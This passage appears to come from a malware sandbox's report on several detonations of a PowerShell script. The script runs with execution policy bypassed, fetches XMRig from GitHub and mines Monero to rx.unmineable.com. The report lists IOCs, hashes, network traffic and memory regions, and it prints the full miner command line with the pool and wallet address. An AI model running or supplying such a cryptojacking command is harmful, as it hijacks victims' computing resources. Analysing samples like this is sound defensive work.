| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.65.42.20.in-addr.arpa | udp |
Files
memory/4104-0-0x00007FFA6A4B3000-0x00007FFA6A4B5000-memory.dmp
memory/4104-6-0x000001D5FD200000-0x000001D5FD222000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0gftsm53.sqc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4104-11-0x00007FFA6A4B0000-0x00007FFA6AF71000-memory.dmp
memory/4104-12-0x00007FFA6A4B0000-0x00007FFA6AF71000-memory.dmp
memory/4104-14-0x00007FFA6A4B0000-0x00007FFA6AF71000-memory.dmp
memory/4104-15-0x000001D5FE0D0000-0x000001D5FE0E2000-memory.dmp
memory/4104-16-0x000001D5FDF70000-0x000001D5FDF7A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4504-47-0x000001C13AD90000-0x000001C13ADB0000-memory.dmp
memory/4504-48-0x000001C13ADD0000-0x000001C13ADF0000-memory.dmp
memory/4504-49-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-50-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-52-0x000001C13ADF0000-0x000001C13AE10000-memory.dmp
memory/4104-51-0x00007FFA6A4B3000-0x00007FFA6A4B5000-memory.dmp
memory/4104-53-0x00007FFA6A4B0000-0x00007FFA6AF71000-memory.dmp
memory/4504-54-0x000001C13AE10000-0x000001C13AE30000-memory.dmp
memory/4504-55-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-56-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-57-0x000001C13ADF0000-0x000001C13AE10000-memory.dmp
memory/4504-58-0x000001C13AE10000-0x000001C13AE30000-memory.dmp
memory/4504-59-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-60-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-61-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-62-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-63-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-64-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-65-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-66-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-67-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-68-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-69-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-70-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-71-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-72-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-73-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-74-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-75-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-76-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-77-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-78-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-79-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-80-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-81-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-82-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-83-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-84-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-85-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-86-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-87-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-88-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-89-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-90-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-91-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-92-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-93-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-94-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-95-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-96-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-97-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-98-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-99-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-100-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-101-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-102-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-103-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-104-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-105-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-106-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-107-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-108-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-109-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-110-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-111-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-112-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-113-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-114-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-115-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-116-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-117-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:55
Platform
win11-20240426-en
Max time kernel
1797s
Max time network
1741s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |

(64 identical rows; the signature fired 64 times with no description, indicator, process or target recorded.)
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 484 wrote to memory of 2136 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 484 wrote to memory of 2136 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/484-0-0x00007FFC49A13000-0x00007FFC49A15000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vmwvoasz.kd3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/484-6-0x00007FFC49A10000-0x00007FFC4A4D2000-memory.dmp
memory/484-10-0x0000020FF2320000-0x0000020FF2342000-memory.dmp
memory/484-11-0x00007FFC49A10000-0x00007FFC4A4D2000-memory.dmp
memory/484-12-0x00007FFC49A10000-0x00007FFC4A4D2000-memory.dmp
memory/484-14-0x0000020FF2700000-0x0000020FF2712000-memory.dmp
memory/484-15-0x0000020FF26E0000-0x0000020FF26EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2136-46-0x0000011850FE0000-0x0000011851000000-memory.dmp
memory/2136-47-0x0000011851030000-0x0000011851050000-memory.dmp
memory/484-49-0x00007FFC49A13000-0x00007FFC49A15000-memory.dmp
memory/2136-48-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/484-50-0x00007FFC49A10000-0x00007FFC4A4D2000-memory.dmp
memory/2136-53-0x0000011851060000-0x0000011851080000-memory.dmp
memory/2136-52-0x0000011851080000-0x00000118510A0000-memory.dmp
memory/484-51-0x00007FFC49A10000-0x00007FFC4A4D2000-memory.dmp
memory/2136-54-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-55-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-56-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-58-0x0000011851060000-0x0000011851080000-memory.dmp
memory/2136-57-0x0000011851080000-0x00000118510A0000-memory.dmp
memory/2136-59-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-60-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-61-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-62-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-63-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-64-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-65-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-66-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-67-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-68-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-69-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-70-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-71-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-72-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-73-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-74-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-75-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-76-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-77-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-78-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-79-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-80-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-81-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-82-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-83-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-84-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-85-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-86-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-87-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-88-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-89-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-90-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-91-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-92-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-93-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-94-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-95-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-96-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-97-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-98-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-99-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-100-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-101-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-102-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-103-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-104-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-105-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-106-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-107-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-108-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-109-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-110-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-111-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-112-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-113-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-114-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-115-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-116-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-117-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:56
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |

(64 identical rows; the signature fired 64 times with no description, indicator, process or target recorded.)
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3508 wrote to memory of 2576 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3508 wrote to memory of 2576 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.253.116.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
memory/3508-3-0x00007FF992773000-0x00007FF992774000-memory.dmp
memory/3508-5-0x00000281DC120000-0x00000281DC142000-memory.dmp
memory/3508-8-0x00007FF992770000-0x00007FF99315C000-memory.dmp
memory/3508-9-0x00000281DC320000-0x00000281DC396000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_skkzxqpa.gvk.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3508-10-0x00007FF992770000-0x00007FF99315C000-memory.dmp
memory/3508-25-0x00007FF992770000-0x00007FF99315C000-memory.dmp
memory/3508-48-0x00000281DC2E0000-0x00000281DC2F2000-memory.dmp
memory/3508-61-0x00000281DC170000-0x00000281DC17A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2576-90-0x000001DE255E0000-0x000001DE25600000-memory.dmp
memory/3508-91-0x00007FF992773000-0x00007FF992774000-memory.dmp
memory/3508-93-0x00007FF992770000-0x00007FF99315C000-memory.dmp
memory/2576-92-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-94-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-95-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-96-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-97-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-98-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-99-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-100-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-101-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-102-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-103-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-104-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-105-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-106-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-107-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-108-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-109-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-110-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-111-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-112-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-113-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-114-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-115-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-116-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-117-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-118-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-119-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-120-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-121-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-122-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-123-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-124-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-125-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-126-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-127-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-128-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-129-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-130-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-131-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-132-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-133-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-134-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-135-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-136-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-137-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-138-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-139-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-140-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-141-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-142-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-143-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-144-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-145-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-146-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-147-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-148-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-149-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-150-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-151-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-152-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-153-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-154-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-155-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:16
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1779s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
